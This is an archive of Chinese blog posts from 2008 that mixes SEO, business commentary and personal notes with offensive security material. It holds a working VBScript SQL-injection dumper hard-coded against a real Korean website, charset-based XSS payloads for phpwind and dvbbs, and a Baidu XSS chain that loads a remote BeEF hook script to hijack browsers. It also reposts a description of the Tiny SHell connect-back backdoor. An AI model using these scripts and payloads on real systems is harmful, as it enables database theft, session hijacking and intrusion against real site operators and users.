从此无名

Sql2005注射辅助脚本[粗糙版]

2008-11-07T13:35:38+08:00

Sql2005注射辅助脚本[粗糙版]
2008/04/14 01:09 P.M.
'***********************************************************************************************
'Sql2005注射辅助脚本[粗糙版] 用于mssql显错模式 By Tr4c3[at]126[Dot]com
'亦适用于MSSQL 2000的注射,不过2000还是用nbsi和Pangolin。
'***********************************************************************************************
'为了保持脚本的通用性，放弃了 and (select col_name(object_id('TableName'),N))=0这样的用法。
'欲返回韩文等字符可修改121或者136行，更多的设置要自己修改
'更多功能请大家自己加入

Const method = "Get" '提交方式请修改此处,有get和post可选
Const DisPlay = "D" 'S 保存到文件，D输出到屏幕

Dim strUrl_B, strUrl, i, k, MyArray, strArg, strD

strUrl_B = "http://onedu.mk.co.kr/02_process/cata1_2.asp?kwajung_code=120'" '基于注射点的不确定性，此处请手工更改
i = 1 '库的基数
k = 0 '表和字段的基数
MyArray = Split(strUrl_B, "?", -1, 1)
strUrl = MyArray(0) '取url
strArg = MyArray(1) '取参数
Set Args = Wscript.Arguments

If Args.Count = 0 Then
ShowU
End If
'If Args.Count =1 And LCase(Args(0))

'************************************************************************
'                              爆库
'************************************************************************
If Args.Count =1 Then
If LCase(Trim(Args(0)))="databases" Then
   ResuT("---------------===============================--------------")
   ResuT("All The DataBases:")

   Do
    strData = " and quotename(db_name("&i&"))=0--"
    sqlInj(strData)
    i = i + 1
   Loop Until StrD=""
   ResuT("---------------===============================--------------")
   Wscript.Quit
ElseIf LCase(Trim(Args(0)))= "info" then
   ResuT("---------------===============================--------------")
   ResuT("The Current Database is:")
   strData = " and quotename(db_name())=0--"
   sqlInj(strData)
   ResuT("---------------===============================--------------")
   ResuT("The database User is:")
   strData = " and quotename(user)=0--"
   sqlInj(strData)
   ResuT("---------------===============================--------------")
   ResuT("The System_user is:")
   strData = " and quotename(System_user)=0--"
   sqlInj(strData)
   ResuT("---------------===============================--------------")
   Wscript.Quit
End If
End If
'************************************************************************
'                              爆表
'************************************************************************
If Args.Count=2 And LCase(Trim(Args(1)))="tables" Then
ResuT("---------------===============================--------------")
ResuT("The Tables Of " & Args(0))
Do
   strData = " and (select top 1 quotename(name) from "& Args(0) & ".dbo.sysobjects where xtype=char(85) AND name not in (select top "& k &" name from "&Args(0)&".dbo.sysobjects where xtype=char(85)))=0--"
   sqlInj(strData)
   k = k + 1
Loop Until StrD=""
ResuT("---------------===============================--------------")
Wscript.Quit
End If

'************************************************************************
'                             爆字段
'************************************************************************
If Args.Count=3 And LCase(Trim(Args(2)))="cols" Then
Database = Args(0)
Table = Args(1)
TarGet = DataBase & ".dbo." & Table
TarGetCol = Database & ".DBO.SYSCOLUMNS"
ResuT("---------------===============================--------------")
ResuT("The Columns Of " & TarGet)
Do
   strData = " and (select top 1 Quotename(name) from "& TarGetCol &" where id=object_id('"& TarGet &"') and name not in (select top "&k&" name from "& TarGetCol &" where id=object_id('"& TarGet &"')))=0--"
   sqlInj(strData)
   k = k + 1
Loop Until StrD=""
ResuT("---------------===============================--------------")
Wscript.Quit
End If

'************************************************************************
'                              爆字段值
'************************************************************************
If Args.Count=4 And LCase(Trim(Args(3)))="values" Then
Database = Args(0)
Table = Args(1)
col = Args(2)
Target = Database & ".dbo." & Table
ResuT("---------------===============================--------------")
ResuT("The Values Of " & Args(2) & " in "&Target)
Do
   strData = " and (select top 1 quotename("& col &") from "& Target & " where "& col &" not in (select top "& k &" "& col &" from "& Target &"))=0--"
   sqlInj(strData)
   k = k + 1
Loop Until StrD=""
ResuT("---------------===============================--------------")
Wscript.Quit
End If

Sub SqlInj(value)
If UCase(method) = "GET" Then
   value = strArg & value
   Set objXML = CreateObject("Microsoft.XMLHTTP")
   objXML.Open "GET", strUrl &"?" & value , False
   objXML.SetRequestHeader "Referer", strUrl
   'objXML.SetRequestHeader "Accept-Language", "EUC-KR"
   objXML.send()
   strRevS = objXML.ResponseText '默认用这个
   'strRevS = bytes2BSTR(objXML.ResponseBody) '韩文有时候要用这个
   If InStr(strRevS,"'[")<>0 And InStr(strRevs,"]'")<>0 Then
    strD = Mid(strRevS,InStr(strRevS,"'[")+2, InStr(strRevs,"]'") - Instr(strRevS,"'[")-2)
    ResuT(" |_"&strD)
   Else
    strD = ""
   End If
ElseIf UCase(method) = "POST" Then
   value = strArg & value
   Set objXML = CreateObject("Microsoft.XMLHTTP")
   objXML.Open "POST", strUrl, False
   objXML.SetRequestHeader "Content-Type", "application/x-www-form-urlencoded"
   objXML.SetRequestHeader "Referer", strUrl
   objXML.send(UrlEncode(value))
   strRevS = objXML.ResponseText '默认用这个
   'strRevS = bytes2BSTR(objXML.ResponseBody) '韩文有时候要用这个
   If InStr(strRevS,"'[")<>0 And InStr(strRevs,"]'")<>0 Then
    strD = Mid(strRevS,InStr(strRevS,"'[")+2, InStr(strRevs,"]'") - Instr(strRevS,"'[")-2)
    ResuT(" |_"&strD)
   Else
    strD = ""
   End If
End If
End Sub

Function ResuT(strInfo)
If UCase(DisPlay) = "S" Then
   Set fso = CreateObject("Scripting.FileSystemObject")
   Set fso1 = fso.OpenTextFile("result.txt",8,True)
   fso1.WriteLine(strInfo)
   fso1.Close
   Set fso = Nothing
ElseIf UCase(DisPlay) = "D" Then
   Wscript.Echo(strInfo)
End If
End Function

Function UrlEncode(str)
str = Replace(str," ","+")
UrlEncode = str
End Function

Function bytes2BSTR(vIn)
    strReturn = ""
    For i = 1 To LenB(vIn)
        ThisCharCode = AscB(MidB(vIn,i,1))
        If ThisCharCode < &H80 Then
            strReturn = strReturn & Chr(ThisCharCode)
        Else
            NextCharCode = AscB(MidB(vIn,i+1,1))
            strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
            i = i + 1
        End If
    Next
    bytes2BSTR = strReturn
End Function

Sub showU()
With Wscript
   .Echo("+--------------------------=====================------------------------------+")
   .Echo("Sql2005注射辅助脚本（粗糙版），用于mssql显错模式 By Tr4c3[at]126[Dot]com")
   .Echo("Usage:")
   .Echo(" cscript "&.ScriptName&" info--爆基本信息")
   .Echo(" cscript "&.ScriptName&" databases--爆所有库名")
   .Echo(" cscript "&.ScriptName&" pubs tables--爆库pubs里所有用户表名")
   .Echo(" cscript "&.ScriptName&" pubs authors cols--爆库pubs里authors表的所有字段名")
   .Echo(" cscript "&.ScriptName&" pubs authors au_id values--爆pubs.dbo.authors里au_id的值")
   .Echo("+--------------------------=====================------------------------------+")
   .Quit
End with
End Sub

阿里妈妈落得悲惨下场的六大根源

2008-09-12T20:50:07+08:00

2008年9月，马云被迫放弃阿里妈妈，把阿里妈妈打入冷宫放入淘宝安养晚年，落得今天的下场，总体而言原因很多啊。不过，现在看到Alimama 舆论还一片歌功颂德说这事，总觉得别扭，马云怎么不知道这是丢脸的事情啊，哎呀，那就容我这个外人(也不算外人，我做过Alimama的客户、用户、合作伙伴，哈哈，三陪啊)反思反思吧，跟大家分享一下我的看法啦!!!

　　1、Alimama准备不足，牺牲了很多淘宝卖家的“第一次”体验。

　　马云开始的算盘是这样打的：自己搞一个自循环(Work 在阿里上)，有人在自己的平台上做生意(淘宝、阿里巴巴B2B)，有人在自己的平台上交钱买东西(支付宝alipay)，卖东西的人把赚来的钱再到自己的地盘来打广告(阿里妈妈)，甚至有天，所有这些人都最终靠阿里的工具吃饭(阿里软件)。

　　为什么Alimama的模式不通，首先要从淘宝的卖家体验来说起。不少淘宝掌柜在Alimama奉献了“第一次”之后，基本上都发帖表达过失望，而对Alimama这个广告平台的态度则发生根本性转变--从最开始的兴奋，转变为初次广告投放之后的失望。不信的人可以去看看Alimama的官方论坛啦。

　　2、Alimama捉摸不定，给站长的不确定感太强。

　　有时候不知是何原因，刚加入的时候还不错，突然之间从某一天开始，从阿里妈妈来的收入突然减半，甚至跌去7成8成。收入非常不稳定。而且，自己去阿里妈妈拿广告和阿里妈妈跟合作伙伴谈的广告，价格差别很大，阿里真的很会欺负人，难道我们自己送上门的站长好欺负么?

　　感觉阿里妈妈真的“明一套暗一套”剥削站长，每个月的收入中，15%技术服务费也蛮高的，而且，剩下的85%超过800元的部分还要扣掉个人所得税，个人所得税最低起征标准20%，超过4000元的还要再提高比例(我算了一下，最后剩下大概2/3左右，感觉反正比你中彩票交的税的比例大了去了。)搞的很多站长被迫无奈，只好申请几个帐号，分开来放阿里妈妈的代码，为的就是多个帐号一起收钱，可以逃“税”.....

　　3、Alimama服务是一个大问题。态度很专业，效果很差劲。

　　阿里的人可能是被驯化过的，有微笑没脑子，从来解决不了啥实际问题，却摆出跟外企一样很nice的职业微笑和台词。比如，阿里妈妈经常在站长提及一些需求时，根本不做正面的回答，很多回答看上去很和蔼，很敬业，其实是敷衍我们站长。象这种“这个是上级要求的哦~我们必须屏蔽的耶~”的回答不计其数，要知道，我们是在做生意，不要用哄孩子的方式来敷衍我们。

　　4、Alimama技术不靠谱，误差是大大的。

　　Alimama广告点击的丢失率极高，百度竞价和Google AdWords也有同样的现象，但没有阿里妈妈严重。如果丢失的点击在25%左右一般是正常的，但是，我们投放的时候统计到的误差却在80%左右，后台得到的数据有时只有报告的1/5到1/6，这个情况就很严重了。

　　对于这个，一般的客户根本不会懂，但骗我们就难了。

　　如果这个事情Alimama严格抓一抓的话，估计一半以上的站长会落马，只是，Alimama之前为了培育市场，同时广告主又不懂愿意买单才导致了事情的恶化却没有解决。

　　从根本上来说，还是Alimama的技术不够完善，匆促推出匆促大规模应用，根本就没有经过实践的检验。对站长还是客户，都显得非常不负责任。马云说回馈当年帮过他的站长们，我感觉真是鸟话，又是TNND的炒作。谁是谁啊!!!!??

　　5、Alimama烧钱太火，只要有流量就买，最后被撑着了。

　　马云真是又可怜又**，他手下不少人啥流量都买，什么钱都敢花(据说个别BD为了给垃圾站卖高流量费，甚至拿黑钱)，流量买了之后卖不掉，消化不了，就放自己的品牌广告，其实啥效果都没有。

　　阿里妈妈不惜血本买流量，还找dz、动网、pw买了不少，在动网、pw论坛上现在还有活动广告。

　　阿里妈妈还跟一些大站合作，为了拿掉百度的广告，甚至赔本去说服站长上Alimama，给什么包月费，就是你以前百度给多少钱的，我至少会包你赚多少钱，只要流量你给我成，其它你不要管。难道投资人的钱不是钱么，当股民是虾米啊!???

　　6、Alimama太急，马云太理想主义，不实践乱决策。

　　说句实话，阿里集团资源不可谓不足，如果广告线综合利用而不是分散成一盘散沙，也许还有机会，就是太急了，一锅粥没有弄清楚。现在并入淘宝也不是最佳的选择。如果是我做的话，至少不会象阿里妈妈那样，前期不依赖于阿里内部客户和各个网站的广告媒体资源，胡乱发展个人站长和网站联盟，贪大贪全。马云啥都想大，败也败一个大的。

　　马云其实前期给阿里妈妈的投入和权力根本不足，就是舆论上给的多一点而已，实权根本没有下放给吴妈(吴咏明，Alimama的ceo)，比如卖广告，其实可以更加强势一点，把阿里巴巴的广告一并交给阿里妈妈，甚至包括淘宝的广告。说句实话，阿里还没有把自己的广告位卖彻底，就帮别人来卖了，不是乱花钱么?没有实践的理论就上马了，还花几个亿投入，不亏本才怪呢。

　　现在Alimama并入淘宝，以后Alimama更无法整合阿里的资源，虽然淘宝的广告是可以让mama来出售了，但其他资源就彻底用不了了，独立的广告业务算是彻底阉割了。

说说长尾关键字

2008-09-07T09:20:51+08:00

什么叫长尾理论、长尾关键字等简单的概念，这样便于我们理解今天的主题。
长尾理论的基本原理是：只要存储和流通的渠道足够大，需求不旺或销量不佳的产品所共同占据的市场份额，可以和那些少数热销产品所占据的市场份额相匹敌甚至更大。即众多小市场汇聚成可与主流大市场相匹敌的市场能量。相信关注搜索引擎营销的朋友都关注到一个概念：长尾关键字，通过对大量网站的访问数据进行分析，用户通过搜索引擎检索的所有关键词中，50%的关键词产生了80%的访问量。而另外20%的访问量则分布于更大数量的关键字，通过对网站流量转换率进一步分析，仅带来20%访问量的关键词转化率更高。国外很多数据和研究报告显示，不到20%访问量的搜索关键字带来了90%的转换。那么这些关键字我们就可称之为长尾关键字。

国内企业利用搜索引擎进行网站推广，可以追溯到2000年，而2002年百度竞价排名的推出让更多中小企业趋之若骛，在此期间搜索引擎优化也开始在小范围内得到实践，不管是竞价排名还是搜索引擎优化都是利用搜索引擎进行网站推广的手段。两种方式的目的相同开展的方式不同，而不论是企业投放搜索引擎竞价排名还是进行搜索引擎优化都不得不考虑一个重要因素，那就是关键字的设置，2006年以来更多的中小企业开始关注长尾关键字所带来的搜索引擎营销价值。

只是浅显的认识到长尾关键字的重要性，在投放关键字广告时候设置不同的关键字是远远不够的，我个人对进行搜索引擎广告投入的客户进行长期观察和监测，发现一个具有共同的特点，近两年企业大都加大了关键字的投入量，而在网站内容所对应不同的长尾关键字的组织却没有几家企业做一定的工作，针对这一问题，我一直在为他们做一些辅导。

搜索引擎优化的根本目标是获得有效的访问量，提升网站转换率，对于搜索引擎优化来说我们需要花费大量的时间研究关键字，为不同的关键字组织相关性的页面内容和网页。

我们会看到不少网站的页面标题（Titles）上会罗列不少关键字，而很少看到网站管理员为不同的关键字设置不同的网页。我们来看这个网页的标题的写法：

暂且不说该网页标题存在严重的堆砌关键字的问题，对该网站访问可以发现，几乎所有页面的标题均为如上所列，而每个网页的内容是各有不同，关键字、标题、网页内容三者之间没有必然的联系，那么根据我们今天所谈到的长尾标题撰写与内容策略，我们应该就不同长尾关键字设置不同的网页与其对应。

说到这里我们可以归纳一下长尾标题撰写与内容策略的一般做法：

1、整理长尾关键字（可根据GOOGLE和BAIDU搜索引擎所提供的关键字选择工具进行选择）

2、为整理出来的长尾关键字编撰相应的页面内容；

3、基于第二点所撰写的内容制作网页页面。

对于第三点特别说明：注意页面前200个字的写法和编辑，并遵循关键字在页面内的分布原则，一般按照页面“自左上角向下”的原则分布。当然还有不少细节需要大家注意，这里不一一罗列，朋友们可以自己体会。

对于中小企业网站来说，一般在新闻资讯类页面、产品信息发布页面、贸易信息发布页面，尤其需要关注长尾标题撰写与内容策略的应用。

GOOGLE搜索引擎相关搜索对长尾关键字的建议，如网站建设：相关搜索：石家庄网站建设，北京网站建设，网站建设的好处北京网站建设，网站建设方案，上海网站建设等

我要骂个人

2008-08-13T21:41:30+08:00

我要骂个人,骂谁呢?==,我先洗个澡.

终于把澡洗完.好长好长时间没写BLOG了.很多事情学会了一笑置之,所以写博客的兴趣就越发减少了.这段时间好忙,都不记得有多少个周末没休息了,更不记得加过多少个班了,体验完心跳的感觉和激情澎湃之后,人难免会有些疲惫.以前我想这就是我想要的生活吧,要有激情,要有惊喜,总是有新的希望出现,不过这已经是两年前的想法了,这些还是我想要的生活的一部分,可是我还想要更多,更多什么?我不敢去多想,可每个月圆之夜似乎都有一个声音在对我说这不是我要的生活,我知道我内心深处肯定知道我想要的生活是什么样的.

说说这几个月让我欣慰的事情吧. NO1,有个女孩变成了我的女朋友,我还决定让她变成我以后的妻子,因为她是我见过的最完美的MM,我想如果我甩了她的话我这辈子都很难找到这么完美的MM了.NO2,终于从贫民窟里搬出来了,找了一个安静的房子住了下来,早上醒来时周围安静的像是一切都停止了,然后我打开音乐,把音量调到5 percent,躺在沙发上让大脑在音乐中慢慢苏醒过来...NO3,网站的发展比我预期的要好,我也成功实现了网站收入在我薪水3倍以上的目标.

哦.对了.我还要骂个人呢.郁闷,真健忘,把要骂谁给忘了.

正则表达式 -- 简单的介绍

2008-08-05T20:53:37+08:00

最简单的符号： ^ * + ? [] 等
ab 就是包含ab字串的任何字符串 ^ab 以ab开头的任何字符串
ab$ 以ab结尾的任何字符串
.为任意字符， ab. 匹配 aba abb abc …等任意字符串
+ ？ *为匹配计数。 +表示前面的字符串匹配1-多次，* 表示 0-多次，？表示0-1次。如 (ab)+ 匹配 ab abab ababab等
[]表示区间字符，如：[A-Z]表示大写字母，通常和+?*联用。[^A-Z]中的^表示反集，就是非大写字母的任意字符。

字符集导致的浏览器跨站脚本攻击

2008-07-30T11:03:15+08:00

Write by admin in web应用程序安全, 客户端安全, 漏洞发布 at 2008-06-06 16:48:44
|=———————————————————————————————–=|
|=—————–=[ 字符集导致的浏览器跨站脚本攻击 ]=—————–=|
|=———————————————————————————————–=|
|=————————————-=[ By jianxin ]=————————————=|
|=——————————-=[ jianxin@80sec.com ]=—————————-=|
|=————————————————————————————————=|

前言：这种利用类型的攻击早在06年就被安全研究人员指出，不过一直没有在国内重视。而由于我们国内大部分站点正是这种有漏洞的字符集，所以影响还是比较大，希望各大站快速修复。可以看看http://applesoup.googlepages.com/。

文中<已经被替换为<,如果需要文档,请访问http://www.80sec.com/release/charset-xss.txt

在一般的web程序里，显示数据给浏览器的时候都会指定一个字符集，在国内平时我们用到的字符集有utf-8，GBK，gb2312等等，字符集指示了浏览器该如何对待返回的数据。其中gb2312和GBK字符集使用得非常广泛，但是经证明，IE在处理这些宽字符集的时候存在问题，导致可能程序的一些安全规则被Bypass掉，引发严重的跨站脚本安全漏洞。在IE里，如果它遇到一个字符，它是指定字符集里的第一位的时候，就会认为其后续字符和当前字符构成一个合法的字符，这样它在解析包括html标签，处理javascript，Css时都会做如此考虑，测试版本为ie6和ie7。

1 Bypass某些js的检查规则

80sec test

这里即使是过滤了<>’\等字符一样可以利用非法字符集序列来实现\的作用，因为它会把原来存在的’给结合掉，然后前面的’找不到闭合，后面[User_IN_PUT]就可以用来执行js代码了。

2 Bypass某些属性的检查规则

为了避免直接使用html导致出现漏洞，一些论坛和程序使用了UBB标签，但是在gbk等多字节编码下，一样容易出现问题，以最容易出现问题的一个UBB标签为例子：

[color=xyz][/color][color=abc onmouseover=alert(/xss/) s=]exploited[/color]

0xC1是一个gb2312的第一个字节，上面结果将会转化为：

exploited

其中的alert(/xss/)将会做一个事件执行，所以即使UBB标签也变得不安全，能饶过”的保护。许多论坛都没有注意这点，phpwind，动网等论坛就容易受到这种攻击。而Discuz通过在转换结果之后附加一个空格，修补了这一安全问题。这里使用到ubb标签其实有一个很有意思的tips在里面，因为有的数据库会抛弃与指定字符集不匹配的字符，所以必须借助后面的]等字符来形成一个有效的汉字才能存储到数据库里，当然像ACCESS这种就不会有问题了，另外一些语言在处理字符串的时候会强制字符串的字符集类型，不合法的字符会导致转码的失败或者遭到抛弃，所以也不能利用这种类型的攻击。

3 几个小例子

Phpwind论坛charset跨站脚本漏洞

[email=xxxx onmouseover=alert() s=羃]Fuck Me
xxxxx

羃是一个特殊的十六进制编码和后面的]结合出来的字符，第一个种方法可以直接复制的：）
0xc1表示一个十六进制的字符编码

同样在dvbbs论坛也很容易产生一个xss代码如下

xxxxxxxxxxxxxxxxxxxxxx

均在新版和老版测试通过。

4 关于修复

对于程序设计者，由于UTF-8字符集的可靠性，不存在这个安全漏洞，所以大家在设计站点的时候可以考虑使用UTF-8字符集。
对于广大开发者，可以牢记最小输入等于最大安全的原则，在匹配正则的时候限制输入的字符的范围，尽量匹配ascii字符，如果必须使用中文，可以考虑类似于discuz的在中文后面添加空格修复该问题。
对于广大用户，这个漏洞由于浏览器处理页面字符的不同，可以考虑使用如Firefox浏览器，可以避免一部分这样的问题。

本站内容均为原创，转载请务必保留署名与链接！
字符集导致的浏览器跨站脚本攻击:http://www.80sec.com/charset-xss.html

Tiny SHell(tsh)

2008-07-29T11:05:14+08:00

Tiny SHell (tsh) is a lightweight client/server clone of the standard remote
      login programs (rlogin, telnet(d), ssh(d), etc.). It is commonly used as
      a remote administration tool for clusters or embedded systems. This program
      provides remote shell execution and file transfers, is 8-bit clean, has
      full support for pseudo-terminal pairs (pty/tty), and uses strong 128-bit
      AES encryption. It can also operate as a backdoor in "connect-back"
      (a.k.a. "reverse-connect") mode in order to bypass firewalls that
      block incoming connections. Most Unix platforms are currently supported
      (Linux, *BSD, Cygwin, SunOS, IRIX, HP-UX, and OSF).

    Tiny SHell was originally developed by Christophe Devine. The last version
      I could find was version 0.6 dated September 11, 2003. I'm a big fan of the project, so I've decided
      to provide some hosting space.

    Some other features I'm thinking about:
      Command line options for standard-mode vs. connect-back modeCommand line options to optionally configure the listening portMAC OS X supportScript executionDoxygen Documentation
    Releases
    Version 0.6 - September 11, 2003

      Download:
tsh-0.6.tgz


    To contact me:
diesel

CSS中expression使用简介

2008-07-24T10:36:41+08:00

定义

　　IE5及其以后版本支持在CSS中使用expression，用来把CSS属性和Javascript表达式关联起来，这里的CSS属性可以是元素固有的属性，也可以是自定义属性。就是说CSS属性后面可以是一段Javascript表达式，CSS属性的值等于Javascript表达式计算的结果。在表达式中可以直接引用元素自身的属性和方法，也可以使用其他浏览器对象。这个表达式就好像是在这个元素的一个成员函数中一样。

　　给元素固有属性赋值

　　例如，你可以依照浏览器的大小来安置一个元素的位置。

#myDiv {
   position:   absolute;
   width:      100px;
   height:     100px;
   left:       expression(document.body.offsetWidth  - 110 + "px");
   top:        expression(document.body.offsetHeight - 110 + "px");
   background: red;
}

　　给元素自定义属性赋值

　　例如，消除页面上的链接虚线框。通常的做法是：

link1
link2
link3

　　粗看或许还体现不出采用expression的优势，但如果你的页面上有几十甚至上百个链接，这时的你难道还会机械式地Ctrl+C，Ctrl+V么，何况两者一比较，哪个产生的冗余代码更多呢？

　　采用expression的做法如下：

a {star : expression(onfocus=this.blur)}

link1
link2
link3

　　说明：里面的star就是自己任意定义的属性，你可以随自己喜好另外定义，接着包含在expression()里的语句就是JS脚本，在自定义属性与expression之间可别忘了还有一个引号，因为实质还是CSS，所以放在style标签内，而非script内。OK，这样就很容易地用一句话实现了页面中的链接虚线框的消除。不过你先别得意，如果触发的特效是CSS的属性变化，那么出来的结果会跟你的本意有差别。例如你想随鼠标的移进移出而改变页面中的文本框颜色更改，你可能想当然的会认为应该写为

input
{star : expression(onmouseover=this.style.backgroundColor="#FF0000";
onmouseout=this.style.backgroundColor="#FFFFFF")}

input {star : expression(onmouseover=this.style.backgroundColor="#FF0000";
onmouseout=this.style.backgroundColor="#FFFFFF")}

　　可结果却是出现脚本出错，正确的写法应该把CSS样式的定义写进函数内，如下所示：

input {star : expression(onmouseover=function()
{this.style.backgroundColor="#FF0000"},
onmouseout=function(){this.style.backgroundColor="#FFFFFF"}) }

　　注意

　　不是非常需要，一般不建议使用expression，因为expression对浏览器资源要求比较高。

跨站脚本漏洞导致的浏览器劫持攻击

2008-06-30T12:33:25+08:00

|=———————————————————————————————–=|
|=—————–=[ 跨站脚本漏洞导致的浏览器劫持攻击 ]=—————–=|
|=———————————————————————————————–=|
|=————————————-=[ By rayh4c ]=————————————=|
|=——————————-=[ rayh4c@80sec.com ]=—————————-=|
|=————————————————————————————————=|

原始来源：http://www.80sec.com/release/browser-hijacking.txt

0x00 唠叨两句

网上看见很多人研究跨站脚本漏洞,好像跨站脚本漏洞已经成为Web安全中的一大热点了，但实际上很多人并不了解这一漏洞能造成什么程度的危害，某同学曾经报过一个参数类型的URL链接XSS给某程序，被厂商鄙视了下，说这种漏洞有什么用，只能弹个框给自己看，最后一笑了之。

0x01 题外科普

跨站脚本漏洞主要分为两类：

一类是存储型XSS，主要出现在让用户输入数据，供其他浏览此页的用户进行查看的地方，包括留言、评论、博客日志和各类表单等。应用程序从数据库中查询数据，在页面中显示出来，攻击者在相关页面输入恶意的脚本数据后，用户浏览此类页面就可能受到攻击。另外一类是参数型XSS，主要是将脚本加入URL地址的程序参数里，参数进入程序后在页面直接输出脚本内容，用户点击类似的恶意链接就可能受到攻击。传统的XSS攻击都是盘算如何盗取客户端COOKIE，然后劫持客户端和WEB服务端的会话，其他还有利用XSS进行网络钓鱼的攻击方法，这类攻击都是针对客户端进行攻击，而近年流行的XSS WORM攻击方式，是通过AJAX技术把恶意的XSS数据感染到每一个用户，可以对WEB服务造成很大的影响，间接实现了对WEB服务端的攻击。

0x02 一个典型的参数型跨站脚本漏洞

我拿百度主页的一个XSS做个演示(以前给百度报过漏洞,但是百度没什么反应)，这个漏洞是由于百度主页tn和bar参数过滤不严导致的参数型XSS：


http://www.baidu.com/index.php?tn="/**/style=xss:expression(alert('xss'));
http://www.baidu.com/index.php?bar="/**/style=xss:expression(alert('xss'));

tn和bar两个参数对应在页面的输出是两个input表单值，可以使用"(双引号)闭合表单值，加入CSS属性跨站，页面具体输出如下：

这个漏洞只能在IE下使用，FIREFOX会把URL链接参数中的"(双引号)转成编码%22,页面参数的输出也会变成%22,就不能闭合"(双引号)跨站。expression()是个不听话的角色，这里可以用一个小技巧来去掉expression烦人的死循环。运行当前URL的#注释符后的代码：


eval(unescape(location.hash.substr(1)))

给window对象的方法定义一个值，判断这个值运行一次代码：


(window.r!=1)?eval('window.r=1;eval(unescape(location.hash.substr(1)))'):1

最后得到完美的攻击链接：


http://www.baidu.com/index.php?bar="/**/style=xss:expression((window.r!=1)?eval('window.r=1;eval(unescape(location.hash.substr(1)))'):1);#alert%28%29

0x03 新的攻击方式

从攻击的起点来说跨站脚本漏洞是有一定局限性的，跨站脚本漏洞无论是针对客户端还是针对WEB服务端的攻击都是被动式的攻击，我们只能在对方站点有漏洞的页面加入了恶意的javascript,用户只有访问了特定的页面才会触发漏洞，而离开这个页面，攻击也就随之失效。我们都知道AJAX技术中的xmlhttp组件是无法跨域发送请求的，一定程度上浏览器的安全特性间接影响着WEB漏洞的发挥，在《浅析浏览器的跨域安全问题》这篇文档里我就说明过浏览器跨域的一些安全特性,其中我发现window对象打开的窗口如果是同一个域的话，可以向打开的这个窗口再注入脚本运行。利用浏览器的这个安全特性，我们结合跨站脚本漏洞就可以修改同域内任何一个页面，比如利用百度的这个XSS来修改www.baidu.com域内的一个页面：

代码内容：


x=window.open('http://www.baidu.com/duty/');
setTimeout(function(){
x.location="javascript:document.write('茄子宝到此一游')"
},10)

最后可以得到的攻击链接：


http://www.baidu.com/index.php?bar="/**/style=xss:expression((window.r!=1)?eval('window.r=1;eval(unescape(location.hash.substr(1)))'):1);#x%3Dwindow.open%28%27http%3A//www.baidu.com/duty/%27%29%3B%0D%0AsetTimeout%28function%28%29%7B%0D%0Ax.location%3D%22javascript%3Adocument.write%28%27%u8304%u5B50%u5B9D%u5230%u6B64%u4E00%u6E38%27%29%22%0D%0A%7D%2C10%29

进入这个链接后，允许浏览器弹窗，会弹出 http://www.baidu.com/duty 页面，整个页面会被修改成“茄子宝到此一游” ：）

0x04 利用XSS漏洞跨页面劫持浏览器

现在我就利用所有的条件来实现一次模拟攻击，首先是核心代码，给打开的窗口注入一个JS：


function win(){
x=window.open('http://www.baidu.com');
setTimeout(function(){
x.location="javascript:var s=document.createElement('script');s.setAttribute('src','http://beef.js');document.getElementsByTagName('head')[0].appendChild(s);void(0)"
},3000)
}

然后是劫持代码，历遍当前页面所有的链接，把链接绑定核心代码：


window.onload=function(){
for (i=0;idocument.links[i].href="javascript:win()"
}
}

再利用百度XSS重写一个页面加入劫持代码，并且把这个攻击链接放入一个框架页：



XSS 注入

http://www.baidu.com/index.php?bar="/**/style=xss:expression((window.r!=1)?eval("window.r=1;eval(unescape(location.hash.substr(1)))"):1);#info%20%3D%22%3Chtml%3E%22+%22%5Cn%22+%0D%0A%22%3Cbody%3E%22+%22%5Cn%22+%0D%0A%22%3Ca%20href%3D%5C%22http%3A//www.baidu.com%5C%22%3E%u70B9%u51FB%u8FDB%u5165%u767E%u5EA6%u4E3B%u9875%3C/a%3E%22+%22%5Cn%22+%0D%0A%22%22+%22%5Cn%22+%0D%0A%22%3Cscript%3E%22+%22%5Cn%22+%0D%0A%22%22+%22%5Cn%22+%0D%0A%22function%20win%28%29%7B%22+%22%5Cn%22+%0D%0A%22x%3Dwindow.open%28%5C%27http%3A//www.baidu.com%5C%27%29%3B%22+%22%5Cn%22+%0D%0A%22setTimeout%28function%28%29%7B%22+%22%5Cn%22+%0D%0A%22x.location%3D%5C%22javascript%3Avar%20s%3Ddocument.createElement%28%5C%27script%5C%27%29%3Bs.setAttribute%28%5C%27src%5C%27%2C%5C%27http%3A//xss.betaslife.com/beef.js%5C%27%29%3Bdocument.getElementsByTagName%28%5C%27head%5C%27%29%5B0%5D.appendChild%28s%29%3Bvoid%280%29%5C%22%22+%22%5Cn%22+%0D%0A%22%7D%2C2000%29%22+%22%5Cn%22+%0D%0A%22%7D%22+%22%5Cn%22+%0D%0A%22%22+%22%5Cn%22+%0D%0A%22%22+%22%5Cn%22+%0D%0A%22for%20%28i%3D0%3Bi%3Cdocument.links.length%3Bi++%29%20%7B%20%22+%22%5Cn%22+%0D%0A%22document.links%5Bi%5D.href%3D%5C%22javascript%3Awin%28%29%5C%22%22+%22%5Cn%22+%0D%0A%22%7D%22+%22%5Cn%22+%0D%0A%22%22+%22%5Cn%22+%0D%0A%22%3C/script%3E%22+%22%5Cn%22+%0D%0A%22%22+%22%5Cn%22+%0D%0A%22%3C/body%3E%22+%22%5Cn%22+%0D%0A%22%3C/html%3E%22%0D%0Adocument.write%28info%29' scrolling="auto">

<br/><body></body><br/>

最后实现的效果是在这个页面打开的链接和浏览的网页的都被注入了脚本，利用参数型跨站脚本漏洞我们成功的构造了一次跨页面的浏览器劫持，模拟攻击中我是给页面注入一个BEEF（非常出名的跨站脚本攻击平台）脚本进行渗透攻击，具体可以参照我这里做好的一个录像:

http://www.80sec.com/release/baidu-xss.html

在这里我只是完成了一个很简陋的EXP，实际攻击中我们注入的脚本应该是把页面重写成跨框架脚本攻击页面(http://ortdx.blog.163.com/blog/static/213610812006912114755107/)，然后再结合AJAX技术劫持页面里所有的链接和表单，新浏览的页面和新开的窗口都能自动注入脚本，这样几乎可以控制住所有从跨站脚本漏洞页面出来的页面。

0x05 总结

